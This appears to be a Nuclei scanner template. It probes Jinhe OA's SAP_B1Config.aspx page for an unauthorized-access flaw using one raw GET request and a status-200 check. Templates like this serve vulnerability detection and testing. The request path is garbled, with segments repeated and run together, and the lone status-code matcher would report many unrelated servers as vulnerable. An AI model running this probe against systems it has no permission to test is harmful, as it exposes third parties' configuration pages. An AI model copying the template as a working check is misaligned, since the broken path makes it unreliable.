id: jinheOA-SAP-B1Config-aspx-weishouquan

info:
  name: 金和OA_SAP_B1Config.aspx未授权访问漏洞
  author: cnaq
  severity: medium
  description: 金和OA_SAP_B1Config.aspx未授权访问漏洞
  reference:
    - https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA_SAP_B1Config.aspx%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md
  tags: jinheOA,download,file,read

requests:
  - raw:
      - |
        GET /C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200